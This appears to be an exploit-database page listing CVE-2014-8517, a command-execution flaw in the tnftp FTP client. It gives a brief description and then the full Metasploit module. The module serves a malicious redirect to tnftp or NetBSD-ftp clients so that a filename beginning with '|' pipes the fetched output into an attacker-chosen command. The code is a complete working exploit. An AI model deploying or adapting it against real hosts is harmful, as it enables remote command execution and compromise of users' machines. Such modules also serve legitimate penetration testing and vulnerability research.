header-logo
Suggest Exploit
vendor:
N/A
by:
Jared McNeill, wvu
N/A
CVSS
N/A
Arbitrary Command Execution
N/A
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: CVE-2014-8517
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-osx-lukemftp-cve-2014-8517/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-7488378d-6007-11e6-a6c3-14dae9d210b8/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2014-8517/https://www.rapid7.com/db/vulnerabilities/apple-osx-afpserver-cve-2014-8517/https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-8517/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix
2014

tnftp “savefile” Arbitrary Command Execution

This module exploits an arbitrary command execution vulnerability in tnftp's handling of the resolved output filename - called "savefile" in the source - from a requested resource. If tnftp is executed without the -o command-line option, it will resolve the output filename from the last component of the requested resource. If the output filename begins with a "|" character, tnftp will pass the fetched resource's output to the command directly following the "|" character through the use of the popen() function.

Mitigation:

N/A
Source

Exploit-DB raw data:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'tnftp "savefile" Arbitrary Command Execution',
      'Description' => %q{
        This module exploits an arbitrary command execution vulnerability in
        tnftp's handling of the resolved output filename - called "savefile" in
        the source - from a requested resource.

        If tnftp is executed without the -o command-line option, it will resolve
        the output filename from the last component of the requested resource.

        If the output filename begins with a "|" character, tnftp will pass the
        fetched resource's output to the command directly following the "|"
        character through the use of the popen() function.
      },
      'Author' => [
        'Jared McNeill', # Vulnerability discovery
        'wvu' # Metasploit module
      ],
      'References' => [
        ['CVE', '2014-8517'],
        ['URL', 'http://seclists.org/oss-sec/2014/q4/459']
      ],
      'DisclosureDate' => 'Oct 28 2014',
      'License' => MSF_LICENSE,
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Privileged' => false,
      'Payload' => {'BadChars' => '/'},
      'Targets' => [['ftp(1)', {}]],
      'DefaultTarget' => 0
    ))
  end

  def on_request_uri(cli, request)
    unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/
      print_status("#{request['User-Agent']} connected")
      send_not_found(cli)
      return
    end

    if request.uri.ends_with?(sploit)
      send_response(cli, '')
      print_good("Executing `#{payload.encoded}'!")
      report_vuln(
        :host => cli.peerhost,
        :name => self.name,
        :refs => self.references,
        :info => request['User-Agent']
      )
    else
      print_status("#{request['User-Agent']} connected")
      print_status('Redirecting to exploit...')
      send_redirect(cli, sploit_uri)
    end
  end

  def sploit_uri
    (get_uri.ends_with?('/') ? get_uri : "#{get_uri}/") +
      Rex::Text.uri_encode(sploit, 'hex-all')
  end

  def sploit
    "|#{payload.encoded}"
  end
end

Navigation

Suggest Exploit

Services By CQR